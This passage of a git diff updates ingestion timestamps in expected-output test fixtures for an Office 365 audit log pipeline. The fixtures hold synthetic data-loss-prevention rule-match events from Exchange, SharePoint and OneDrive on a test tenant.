Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", @@ -498,7 +498,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.292353800Z", + "ingested": "2021-12-14T14:49:26.527202811Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExceptionInfo\":\"{ \\\"Justification\\\": \\\"I really need to share those files\\\" }\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", @@ -673,7 +673,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.292360200Z", + "ingested": "2021-12-14T14:49:26.527203339Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExceptionInfo\":{\"FalsePositive\":true},\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", @@ -800,7 +800,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:42:29.292366400Z", + "ingested": "2021-12-14T14:49:26.527203826Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13310,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"a42123a9-1c07-4dde-9be6-ac71cb9fd16b\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"8398c03a-a00d-42bb-8f80-ead0ad04e1df\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected test\",\"Severity\":\"Low\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", @@ -918,7 +918,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:42:29.292372700Z", + "ingested": "2021-12-14T14:49:26.527204283Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"Id\":\"a42123a9-1c07-4dde-9be6-ac71cb9fd16b\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"8398c03a-a00d-42bb-8f80-ead0ad04e1df\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected test\",\"Severity\":\"Low\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Company-Internal-Financial.docx\",\"FileOwner\":\"alice@testsiem2.onmicrosoft.com\",\"FilePathUrl\":\"https://example.net/testsiem2.onmicrosoft.com/sharepoint\",\"From\":\"alice@testsiem2.onmicrosoft.com\",\"LastModifiedTime\":\"2020-02-24T12:13:14Z\",\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\",\"itemCreationTime\":\"2020-02-20T11:23:45\"},\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json index 6c0abb8d322..e3b3fbe2c8e 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json @@ -84,7 +84,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:42:29.971752Z", + "ingested": "2021-12-14T14:49:27.201924295Z", "original": "{\"CreationTime\":\"2020-02-25T16:20:15\",\"Id\":\"a21f13b9-22b6-405b-bf9e-a07ad8d456da\",\"IncidentId\":\"3066c3c5-eb56-dd03-b000-08d7ba115afd\",\"ObjectId\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[],\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"c5981414-9f1f-4275-a2df-2fbfb1d03795\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected U.S. Financial\",\"Severity\":\"Low\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T15:22:49\",\"ItemLastModifiedTime\":\"2020-02-25T16:19:43\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", @@ -198,7 +198,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.971758400Z", + "ingested": "2021-12-14T14:49:27.201926400Z", "original": "{\"CreationTime\":\"2020-02-25T16:23:39\",\"Id\":\"eb8259c8-d2c2-449d-bd35-5c8a033eb629\",\"IncidentId\":\"eeeb7b44-fc69-c19f-b000-08d7ba115afd\",\"ObjectId\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:SiteAdmin\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":12,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"7503b92a-67c2-494b-8a46-57ef0d738886\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected U.S. Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data Copy.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data%20Copy.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T16:21:50\",\"ItemLastModifiedTime\":\"2020-02-25T16:21:44\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", @@ -308,7 +308,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:42:29.971764Z", + "ingested": "2021-12-14T14:49:27.201926880Z", "original": "{\"CreationTime\":\"2020-02-25T16:23:39\",\"Id\":\"50a90c83-7e15-4679-8778-d9dd30927e66\",\"IncidentId\":\"eeeb7b44-fc69-c19f-b000-08d7ba115afd\",\"ObjectId\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[],\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":12,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"c5981414-9f1f-4275-a2df-2fbfb1d03795\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected U.S. Financial\",\"Severity\":\"Low\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data Copy.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data%20Copy.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T16:21:50\",\"ItemLastModifiedTime\":\"2020-02-25T16:21:44\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", @@ -422,7 +422,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.971777700Z", + "ingested": "2021-12-14T14:49:27.201927317Z", "original": "{\"CreationTime\":\"2020-02-25T16:22:22\",\"Id\":\"59652f9a-087c-4b65-b88c-b293ade34202\",\"IncidentId\":\"3066c3c5-eb56-dd03-b000-08d7ba115afd\",\"ObjectId\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:SiteAdmin\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":12,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"7503b92a-67c2-494b-8a46-57ef0d738886\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected U.S. Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T15:22:49\",\"ItemLastModifiedTime\":\"2020-02-25T16:21:44\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", @@ -536,7 +536,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.971782400Z", + "ingested": "2021-12-14T14:49:27.201927733Z", "original": "{\"CreationTime\":\"2020-02-26T10:13:48\",\"Id\":\"d69c6758-f210-43bd-bac1-563adef4b4cf\",\"IncidentId\":\"f7295114-e601-f2b6-8800-08d7baa56f8b\",\"ObjectId\":\"f026407b-090a-4c15-99b5-09851842d96d\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"08745d02-5d45-48bd-98e1-8199ab1efdbe\",\"PolicyName\":\"Financial Data Detection\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:SiteAdmin\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":42,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":85,\"Count\":23,\"SensitiveType\":\"0e9b3178-9678-47dd-a509-37222ca96b42\"}]},\"RuleId\":\"bc4d376f-b038-4695-9362-609d32f963cf\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected France Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"INTERNAL CREDIT CARD NUMBERS.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/INTERNAL%20CREDIT%20CARD%20NUMBERS.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-26T09:44:40\",\"ItemLastModifiedTime\":\"2020-02-26T09:46:23\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"f026407b-090a-4c15-99b5-09851842d96d\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", @@ -650,7 +650,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.971787300Z", + "ingested": "2021-12-14T14:49:27.201928151Z", "original": "{\"CreationTime\":\"2020-02-26T12:39:40\",\"Id\":\"93585ace-96eb-4af1-fdb2-08d7bab8f2bd\",\"IncidentId\":\"0ae82be2-e321-ab52-d000-08d7bab8fe55\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"08745d02-5d45-48bd-98e1-8199ab1efdbe\",\"PolicyName\":\"Financial Data Detection\",\"Rules\":[{\"ActionParameters\":[\"GenerateAlert:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"NotifyUser\",\"GenerateAlert\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":42,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":85,\"Count\":2,\"SensitiveType\":\"0e9b3178-9678-47dd-a509-37222ca96b42\"}]},\"RuleId\":\"121c85c3-b2b2-4d5b-af11-b1d1bc0b36fd\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected France Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Document.docx\",\"FileOwner\":\"alice@testsiem2.onmicrosoft.com\",\"FilePathUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications/Shared%20Documents/Document.docx\",\"FileSize\":35920,\"From\":\"alice@testsiem2.onmicrosoft.com\",\"IsViewableByExternalUsers\":false,\"ItemCreationTime\":\"2020-02-26T09:55:38\",\"ItemLastModifiedTime\":\"2020-02-26T09:56:12\",\"SiteCollectionGuid\":\"4aaa3319-df17-4ea0-a142-42cf204cfc62\",\"SiteCollectionUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications\",\"UniqueID\":\"3ace820e-9358-4520-9df6-5bd65602cef0\"},\"UserId\":\"DLPAgent\",\"UserKey\":\"DLPAgent\",\"UserType\":4,\"Version\":1,\"Workload\":\"SharePoint\"}", "code": "ComplianceDLPSharePoint", "provider": "SharePoint", @@ -764,7 +764,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.971792700Z", + "ingested": "2021-12-14T14:49:27.201928572Z", "original": "{\"CreationTime\":\"2020-02-26T12:39:40\",\"Id\":\"93585ace-96eb-4af1-fdb2-08d7bab8f2bd\",\"IncidentId\":\"0ae82be2-e321-ab52-d000-08d7bab8fe55\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"08745d02-5d45-48bd-98e1-8199ab1efdbe\",\"PolicyName\":\"Financial Data Detection\",\"Rules\":[{\"ActionParameters\":[\"GenerateAlert:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"NotifyUser\",\"GenerateAlert\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":42,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":85,\"Count\":2,\"SensitiveType\":\"0e9b3178-9678-47dd-a509-37222ca96b42\"}]},\"RuleId\":\"121c85c3-b2b2-4d5b-af11-b1d1bc0b36fd\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected France Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Document.docx\",\"FileOwner\":\"alice@testsiem2.onmicrosoft.com\",\"FilePathUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications/Shared%20Documents/Document.docx\",\"FileSize\":35920,\"From\":\"alice@testsiem2.onmicrosoft.com\",\"IsViewableByExternalUsers\":false,\"ItemCreationTime\":\"2020-02-26T09:55:38\",\"ItemLastModifiedTime\":\"2020-02-26T09:56:12\",\"SiteCollectionGuid\":\"4aaa3319-df17-4ea0-a142-42cf204cfc62\",\"SiteCollectionUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications\",\"UniqueID\":\"3ace820e-9358-4520-9df6-5bd65602cef0\"},\"UserId\":\"DLPAgent\",\"UserKey\":\"DLPAgent\",\"UserType\":4,\"Version\":1,\"Workload\":\"SharePoint\"}", "code": "ComplianceDLPSharePoint", "provider": "SharePoint", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json index fa9f120c507..23d58db7ad8 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json @@ -49,7 +49,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852951400Z", + "ingested": "2021-12-14T14:49:28.056941390Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 